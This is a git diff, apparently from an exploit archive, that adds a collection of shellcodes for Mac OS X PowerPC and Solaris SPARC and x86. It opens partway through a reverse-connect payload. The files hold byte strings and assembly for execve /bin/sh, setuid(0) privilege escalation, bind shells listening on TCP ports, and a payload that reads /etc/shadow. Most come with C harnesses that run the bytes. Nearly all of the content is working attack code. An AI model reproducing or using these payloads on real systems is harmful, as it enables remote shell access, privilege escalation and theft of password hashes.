r25 + stw r29, -20(r1) + + ; addr - patch the xor dword + lis r29, hi16(0x7f000001^0x01020304) + ori r29, r29, lo16(0x7f000001^0x01020304) + lis r28, hi16(0x01020304) + ori r28, r28, lo16(0x01020304) + xor r29, r29, r28 + stw r29, -16(r1) + +konnect: + la r4, -20(r1) + subi r5, r27, 0x3030 + 97 - 16 + subi r0, r27, 0x3030 + 97 - 98 + mr r3, r30 + .long 0x44ffff02 + xor r5, r5, r5 + +reader: + li r29, 0x3330 + srawi r29, r29, 12 + + subi r0, r27, 0x3030 + 97 - 3 + mr r3, r30 + subi r4, r1, 8192+44 + li r5, 8192+44 + mtctr r4 + .long 0x44ffff02 + xor r5, r5, r5 + xor. r5, r5, r5 + blectr + xor r5, r5, r5 \ No newline at end of file diff --git a/shellcodes/osx_ppc/43615.c b/shellcodes/osx_ppc/43615.c new file mode 100644 index 000000000..675c8e7a2 --- /dev/null +++ b/shellcodes/osx_ppc/43615.c @@ -0,0 +1,19 @@ +"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa" +"\x38\xa5\xf8\x4a\x3c\xc0\x28\x1a\x60\xc6\x7f\x0e\x38\x85\x07\xee" +"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a" +"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba" +"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\x10\x7a\x7f\x0c" +"\x10\x9a\x7f\x0f\x10\xba\x7f\x08\x10\x1a\x7f\x6f\x6c\x1a\x7f\x0c" +"\x54\x1a\x7d\x76\x54\x64\x64\x76\x60\x1a\x7f\x03\x28\x18\x60\x4e" +"\x28\x1a\x7f\x0e\x54\x92\x7d\xa8\x10\xba\x7f\x1e\x10\x1a\x7f\x66" +"\x57\xd9\x8c\x76\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x10\x1a\x7f\x64" +"\x57\xd9\x8c\x76\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x57\xd9\x8c\x76" +"\x10\x1a\x7f\x10\x10\x9a\x7f\x1e\xb8\x9b\x80\xe6\x10\xbb\x80\xe6" +"\x10\x9b\x80\xfe\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x54\x64\x64\x76" +"\x10\xba\x7f\x0c\x10\x1a\x7f\x54\x57\xd9\x8c\x76\x54\xbe\x54\x76" +"\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x10\xbf\x80\xf1\x04\x1f\x80\xf1" +"\x68\x98\x80\xeb\x10\x1a\x7f\x4c\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76" +"\x54\xbf\x55\x77\x68\x98\x80\xf3\x54\x72\x7d\xa8\x10\x79\x7f\x26" +"\xb8\x7b\x80\xf6\xb8\xbb\x80\xf2\x10\x9b\x80\xf6\x10\x1a\x7f\x35" +"\x54\x1a\x7b\xa2\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x57\xfa\x7f\x06" +"\x07\x78\x16\x60\x07\x79\x0c\x66\x28\x1a\x7f\x0e"; \ No newline at end of file diff --git a/shellcodes/osx_ppc/43616.asm b/shellcodes/osx_ppc/43616.asm new file mode 100644 index 000000000..92bbbdf70 --- /dev/null +++ b/shellcodes/osx_ppc/43616.asm @@ -0,0 +1,33 @@ +;;; $Id: ppc-execve.s,v 1.1 2003/03/01 01:10:48 ghandi Exp $ +;;; PPC MacOS X (maybe others) shellcode +;;; +;;; After assembly, change bytes 2 and 3 of the 'sc' instruction encoding +;;; from 0x00 to 0xff. +;;; +;;; ghandi < ghandi@mindless.com > +;;; + +.globl _execve_binsh +.text +_execve_binsh: + ;; Don't branch, but do link. This gives us the location of + ;; our code. Move the address into GPR 31. + xor. r5, r5, r5 ; r5 = NULL + bnel _execve_binsh + mflr r31 + + ;; Use the magic offset constant 268 because it makes the + ;; instruction encodings null-byte free. + addi r31, r31, 268+36 + addi r3, r31, -268 ; r3 = path + + ;; Create argv[] = {path, 0} in the "red zone" on the stack + stw r3, -8(r1) ; argv[0] = path + stw r5, -4(r1) ; argv[1] = NULL + subi r4, r1, 8 ; r4 = {path, 0} + + ;; 59 = 30209 >> 9 (trick to avoid null-bytes) + li r30, 30209 + srawi r0, r30, 9 ; r0 = 59 + sc ; execve(path, argv, NULL) +path: .asciz "/bin/sh" \ No newline at end of file diff --git a/shellcodes/osx_ppc/43617.c b/shellcodes/osx_ppc/43617.c new file mode 100644 index 000000000..b66013a7e --- /dev/null +++ b/shellcodes/osx_ppc/43617.c @@ -0,0 +1,62 @@ +/* + * [MacOSX/PowerPC] + * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL), exit() + * 72 bytes + * hophet [at] gmail.com + * http://www.nlabs.com.br/~hophet/ + * + */ + +#include "stdio.h" +#include "string.h" + +char shellcode[] = + +"\x7c\xa5\x2a\x79" +"\x40\x82\xff\xfd" +"\x7d\x68\x02\xa6" +"\x3b\xeb\x01\x71" +"\x39\x40\x01\x71" +"\x39\x1f\xfe\xce" +"\x7c\xa8\x29\xae" +"\x38\x7f\xfe\xc7" +"\x90\x61\xff\xf8" +"\x90\xa1\xff\xfc" +"\x38\x81\xff\xf8" +"\x38\x0a\xfe\xca" +"\x44\xff\xff\x02" +"\x60\x60\x60\x60" +"\x38\x0a\xfe\x90" +"\x44\xff\xff\x02" +"\x2f\x62\x69\x6e" +"\x2f\x73\x68\x54"; + +int main() { + + void (*p)(); + p = (void *)&shellcode; + printf("Lenght: %d\n", strlen(shellcode)); + p(); +} +/* +.globl _main +.text +_main: + xor. r5, r5, r5 // r5 = NULL + bnel _main + mflr r11 + addi r31, r11, 369 + li r10, 369 + addi r8, r31, -306 + stbx r5, r8, r5 + addi r3, r31, -313 + stw r3, -8(r1) // [/bin/sh] + stw r5, -4(r1) + subi r4, r1, 8 // [/bin/sh] + addi r0, r10, -310 // r0 = 59 + .long 0x44ffff02 // sc opcode + .long 0x60606060 // NOP + addi r0, r10, -368 // r0 = 1 + .long 0x44ffff02 // sc opcode +string: .asciz "/bin/shT" +*/ \ No newline at end of file diff --git a/shellcodes/solaris_sparc/13489.c b/shellcodes/solaris_mips/13489.c similarity index 100% rename from shellcodes/solaris_sparc/13489.c rename to shellcodes/solaris_mips/13489.c diff --git a/shellcodes/solaris_sparc/43621.c b/shellcodes/solaris_sparc/43621.c new file mode 100644 index 000000000..057303f16 --- /dev/null +++ b/shellcodes/solaris_sparc/43621.c @@ -0,0 +1,73 @@ +/* + * Solaris shellcode - setreuid(geteuid()), setregid(getegid()), execve /bin/sh + * + * Claes M. Nyberg 20020124 + * , + */ + +#include + +static char solaris_code[] = + + /* geteuid() */ + "\x82\x10\x20\x18" /* mov 24, %g1 */ + "\x91\xd0\x20\x08" /* ta 0x8 */ + "\x90\x02\x60\x01" /* add %o1, 1, %o0 */ + + /* setreuid() */ + "\x90\x22\x20\x01" /* sub %o0, 1, %o0 */ + "\x92\x10\x3f\xff" /* mov -1, %o1 */ + "\x82\x10\x20\xca" /* mov 202, %g1 */ + "\x91\xd0\x20\x08" /* ta 0x8 */ + + /* getegid() */ + "\x82\x10\x20\x2f" /* mov 47, %g1 */ + "\x91\xd0\x20\x08" /* ta 0x8 */ + "\x90\x02\x60\x01" /* add %o1, 1, %o0 */ + + /* setregid() */ + "\x90\x22\x20\x01" /* sub %o0, 1, %o0 */ + "\x92\x10\x3f\xff" /* mov -1, %o1 */ + "\x82\x10\x20\xcb" /* mov 203, %g1 */ + "\x91\xd0\x20\x08" /* ta 0x8 */ + + /* execve(/bin/sh ..) */ + "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */ + "\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */ + "\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 */ + "\x23\x0b\xcb\xdc" /* sethi %hi(0x2f2f7000), %l1 */ + "\xa2\x14\x63\x68" /* or %l1, 0x368, %l1 */ + "\xd4\x23\xbf\xfc" /* st %o2, [%sp - 4] */ + "\xe2\x23\xbf\xf8" /* st %l1, [%sp - 8] */ + "\xe0\x23\xbf\xf4" /* st %l0, [%sp - 12] */ + "\x90\x23\xa0\x0c" /* sub %sp, 12, %o0 */ + "\xd4\x23\xbf\xf0" /* st %o2, [%sp - 16] */ + "\xd0\x23\xbf\xec" /* st %o0, [%sp - 20] */ + "\x92\x23\xa0\x14" /* sub %sp, 20, %o1 */ + "\x82\x10\x20\x3b" /* mov 59, %g1 */ + "\x91\xd0\x20\x08" /* ta 0x8 */ + + /* exit() */ + "\x82\x10\x20\x01" /* mov 1, %g1 */ + "\x91\xd0\x20\x08"; /* ta 0x8 */ + + +static char _solaris_code[] = + "\x82\x10\x20\x18\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22" + "\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xca\x91\xd0\x20\x08" + "\x82\x10\x20\x2f\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22" + "\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xcb\x91\xd0\x20\x08" + "\x94\x1a\x80\x0a\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b" + "\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8" + "\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23" + "\xbf\xec\x92\x23\xa0\x14\x82\x10\x20\x3b\x91\xd0\x20\x08" + "\x82\x10\x20\x01\x91\xd0\x20\x08"; + +int +main(void) +{ + void (*code)() = (void *)_solaris_code; + printf("Shellcode length: %d\n", strlen(_solaris_code)); + code(); + return(1); +} \ No newline at end of file diff --git a/shellcodes/solaris_sparc/43622.asm b/shellcodes/solaris_sparc/43622.asm new file mode 100644 index 000000000..9dacd162d --- /dev/null +++ b/shellcodes/solaris_sparc/43622.asm @@ -0,0 +1,87 @@ +!!! $Id: sparc-bind.s,v 1.1 2003/03/01 01:10:51 ghandi Exp $ +!!! Bind /bin/sh to TCP port 2001. Calls setuid(0) so /bin/sh won't +!!! drop privileges. After assembly, change the third byte in the +!!! trap instructions to 0x38 to avoid having spaces in the input so that +!!! it may be used in an HTTP GET request. For Solaris/SPARC. +!!! +!!! "I've come here to chew bubble-gum and kick ass...And I'm all out of +!!! bubble gum." +!!! -- Nada (Roddy Piper), "They Live" +!!! +!!! -ghandi < ghandi@mindless.com > +!!! + +.global bindsh +.type bindsh,#function + +bindsh: sub %sp, 16, %l0 ! struct sockaddr sa; + + sub %sp, %l0, %l7; + st %l7, [%sp - 20] ! int sa_len = 16; + + sub %l7, 14, %o0 + sub %l7, 14, %o1 + xor %l1, %l1, %o2 + xor %l1, %l1, %o3 ! %o3 will be used as a %g0 + sub %l7, 15, %o4 + add %l7, (230 - 16), %g1 + ta 8 + xor %o2, %o0, %l2 ! s = socket(AF_INET, SOCK_STREAM, 0); + + sth %o1, [%sp - 16] ! sa.sin_family = AF_INET; + mov 2001, %l6 + sth %l6, [%sp - 14] ! sa.sin_port = 2001; + st %g0, [%sp - 12] ! sa.sin_addr.s_addr = INADDR_ANY; + + xor %o3, %l2, %o0 + xor %o3, %l0, %o1 + xor %o3, %l7, %o2 + add %l7, (232 - 16), %g1 + ta 8 ! bind(s, &sa, sa_len); + + xor %o3, %l2, %o0 + sub %l7, (16 - 5), %o1 + add %l7, (233 - 16), %g1 + ta 8 ! listen(s, SOMAXCONN); + + xor %o3, %l2, %o0 + xor %o3, %l0, %o1 + sub %sp, 20, %o2 + add %l7, (234 - 16), %g1 + ta 8 + xor %o3, %o0, %l3 ! c = accept(s, &sa, &sa_len); + + xor %o3, %l3, %o0 + sub %l7, (16 - 9), %o1 + xor %sp, %sp, %o2 + add %l7, (62 - 16), %g1 + ta 8 ! ioctl(c, I_DUP2FD, 0); + + xor %o3, %l3, %o0 + sub %l7, (16 - 9), %o1 + add %o3, 1, %o2 + add %l7, (62 - 16), %g1 + ta 8 ! ioctl(c, I_DUP2FD, 1); + + xor %o3, %l3, %o0 + sub %l7, (16 - 9), %o1 + add %o3, 2, %o2 + add %l7, (62 - 16), %g1 + ta 8 ! ioctl(c, I_DUP2FD, 2); + + xor %sp, %sp, %o0 ! %o0 = 0; + add %o3, 23, %g1 + ta 8 ! setuid(0); + set 0x2f62696e, %l0 ! (void*)sh = '/bin'; + set 0x2f736800, %l1 ! (void*)sh + 4 = '/sh0'; + sub %sp, 16, %o0 ! %o0 = '/bin/sh'; + sub %sp, 8, %o1 ! %o1 = {'/bin/sh', NULL}; + xor %sp, %sp, %o2 ! %o2 = NULL; + std %l0, [%sp - 16] + st %o0, [%sp - 8] ! argv[0] = sh; + st %g0, [%sp - 4] ! argv[1] = NULL; + add %o3, 59, %g1 + ta 8 ! execve(sh, argv, NULL); + xor %sp, %sp, %o0 ! %o0 = 0; + add %o3, 160, %g1 ! %g1 = 160; + ta 8 ! lwp_exit(0) \ No newline at end of file diff --git a/shellcodes/solaris_sparc/43623.asm b/shellcodes/solaris_sparc/43623.asm new file mode 100644 index 000000000..bb5ed3b30 --- /dev/null +++ b/shellcodes/solaris_sparc/43623.asm @@ -0,0 +1,78 @@ +## +# +# Name: single_bind_tcp +# Platforms: Solaris +# Authors: vlad902 +# Version: $Revision: 1.2 $ +# License: +# +# This file is part of the Metasploit Exploit Framework +# and is subject to the same licenses and copyrights as +# the rest of this package. +# +# Description: +# +# Single bind TCP shell. +# +## + +.globl main + +main: + andn %sp, 7, %sp + + mov 1, %o4 + xor %o3, %o3, %o3 + xor %o3, %o3, %o2 + mov 0x02, %o1 + mov 0x02, %o0 + mov 0xe6, %g1 + ta 0x08 + + st %o0, [ %sp - 0x08 ] + +#ifndef NO_NULLS + set 0x00027a68, %l0 +#else + set 0x27a68fff, %l0 + srl %l0, 12, %l0 +#endif + st %l0, [ %sp - 0x10 ] + st %g0, [ %sp - 0x0c ] + sub %sp, 16, %o1 + mov 0x10, %o2 + mov 0xe8, %g1 + ta 0x08 + + ld [ %sp - 0x08 ], %o0 + mov 0x01, %o1 + mov 0xe9, %g1 + ta 0x08 + + ld [ %sp - 0x08 ], %o0 + xor %o1, %o1, %o1 + or %o1, %o1, %o2 + mov 0xea, %g1 + ta 0x08 + + st %o0, [ %sp - 0x08 ] + mov 3, %o2 +fcntl_loop: + mov 9, %o1 + subcc %o2, 1, %o2 + mov 0x3e, %g1 + ta 0x08 + + bnz fcntl_loop + ld [ %sp - 0x08 ], %o0 + + xor %o3, %o3, %o2 + set 0x2f62696e, %l0 + set 0x2f736800, %l1 + sub %sp, 0x10, %o0 + sub %sp, 0x08, %o1 + std %l0, [ %sp - 0x10 ] + st %o0, [ %sp - 0x08 ] + st %g0, [ %sp - 0x04 ] + mov 0x3b, %g1 + ta 0x08 \ No newline at end of file diff --git a/shellcodes/solaris_x86/43624.asm b/shellcodes/solaris_x86/43624.asm new file mode 100644 index 000000000..36dd90456 --- /dev/null +++ b/shellcodes/solaris_x86/43624.asm @@ -0,0 +1,50 @@ +Name = John Babio +Twitter = 3vi1john + +SunOS opensolaris 10 5.11 i86pc i386 i86pc + +setuid(0) /bin/cat //etc/shadow + +char code[]= + "\x33\xc0\x50\x50\xb0\x17\xcd\x91\x33\xd2\x52\x68\x61\x64\x6f" + "\x77\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x8b\xcc\x52\x68" + "\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8b\xdc\x52\x51\x53\x8b" + "\xcc\x52\x51\x53\xb0\x3b\x52\xcd\x91\x33\xc0\x50\xb0\x01\xcd\x91"; + +int main(int argc, char **argv) +{ + int (*func)(); + func = (int (*)()) code; + (int)(*func)(); +} + +8050410 <_start>: + 8050410: 33 c0 xor %eax,%eax + 8050412: 50 push %eax + 8050413: 50 push %eax + 8050414: b0 17 mov $0x17,%al + 8050416: cd 91 int $0x91 + 8050418: 33 d2 xor %edx,%edx + 805041a: 52 push %edx + 805041b: 68 61 64 6f 77 push $0x776f6461 + 8050420: 68 63 2f 73 68 push $0x68732f63 + 8050425: 68 2f 2f 65 74 push $0x74652f2f + 805042a: 8b cc mov %esp,%ecx + 805042c: 52 push %edx + 805042d: 68 2f 63 61 74 push $0x7461632f + 8050432: 68 2f 62 69 6e push $0x6e69622f + 8050437: 8b dc mov %esp,%ebx + 8050439: 52 push %edx + 805043a: 51 push %ecx + 805043b: 53 push %ebx + 805043c: 8b cc mov %esp,%ecx + 805043e: 52 push %edx + 805043f: 51 push %ecx + 8050440: 53 push %ebx + 8050441: b0 3b mov $0x3b,%al + 8050443: 52 push %edx + 8050444: cd 91 int $0x91 + 8050446: 33 c0 xor %eax,%eax + 8050448: 50 push %eax + 8050449: b0 01 mov $0x1,%al + 805044b: cd 91 int $0x91 \ No newline at end of file diff --git a/shellcodes/solaris_x86/43625.c b/shellcodes/solaris_x86/43625.c new file mode 100644 index 000000000..086997279 --- /dev/null +++ b/shellcodes/solaris_x86/43625.c @@ -0,0 +1,42 @@ +/* + * Solaris shellcode - execve /bin/sh + */ + +#include + +// http://www.shellcode.com.ar +// +// execve(//bin/sh) + +char shellcode[]= + "\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh + "\xf7\xd0" // not eax + "\x50" // push eax + "\x31\xc0" // xor eax, eax + "\xb0\x9a" // mov al, 09ah + "\x50" // push eax + "\x89\xe5" // mov ebp, esp + "\x31\xc0" // xor eax, eax + "\x50" // push eax + "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh + "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh + "\x89\xe3" // mov ebx, esp + "\x50" // push eax + "\x53" // push ebx + "\x89\xe2" // mov edx, esp + "\x50" // push eax + "\x52" // push edx + "\x53" // push ebx + "\xb0\x3b" // mov al, 59 + "\xff\xd5"; // call ebp + +// + +int +main(void) +{ + void (*code)() = (void *)shellcode; + printf("Shellcode length: %d\n", strlen(shellcode)); + code(); + return(1); +} \ No newline at end of file